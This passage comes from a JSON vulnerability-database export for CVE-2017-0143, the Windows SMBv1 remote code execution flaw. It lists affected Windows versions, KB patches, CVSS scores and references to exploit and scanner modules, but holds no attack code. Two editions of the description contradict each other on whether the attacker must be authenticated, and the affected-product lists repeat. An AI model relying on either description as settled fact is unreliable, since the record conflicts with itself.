"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", 
"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], 
"vendorCvss": {}}, "lastseen": "2021-09-20T12:46:46", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server; no credentials are required, consistent with the Au:N / PR:N CVSS vectors below.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", 
"references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T14:58:45", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012606", "KB4012213", "KB4013198", "KB3210721", "KB4012216", "KB3177186", "KB3205409", "KB3205401", "KB4012212", "KB4013429", "KB4012598", "KB3213986", "KB3212646", "KB4012217", "KBMS16-110, 3187754", "KB3210720", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": 
"KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 
2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit 
Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:45", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-21T08:57:08", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, 
{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3205409", "KB3210720", "KB3213986", "KB3205401", "KB4013198", "KB4012598", "KB4012212", "KB3212646", "KB3210721", "KB4012217", "KB4012606", "KB4012214", "KB4012216", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": 
